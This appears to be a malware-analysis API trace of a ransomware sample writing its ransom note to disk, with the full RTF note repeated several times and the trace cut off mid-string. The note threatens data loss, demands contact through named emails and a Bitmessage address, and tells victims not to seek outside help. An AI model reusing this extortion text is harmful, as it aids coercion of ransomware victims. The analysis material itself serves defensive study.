Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\\\x1e4=a\x99ª\x8d\\Ë\x04`\x1b\x1ehG(\"…ê\x19Ö0\x03ã\x08", lpUsedDefaultChar=0x0) returned 8717 [0220.383] WriteFile (in: hFile=0x2d0, lpBuffer=0x38dfac8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x38dfac8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0220.384] CloseHandle (hObject=0x2d0) returned 1 [0220.384] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\defaults\\pref\\#readme_eman#.rtf")) returned 0xffffffff [0220.384] GetLastError () returned 0x2 [0220.384] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\defaults\\pref\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0220.392] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0220.392] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0220.392] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 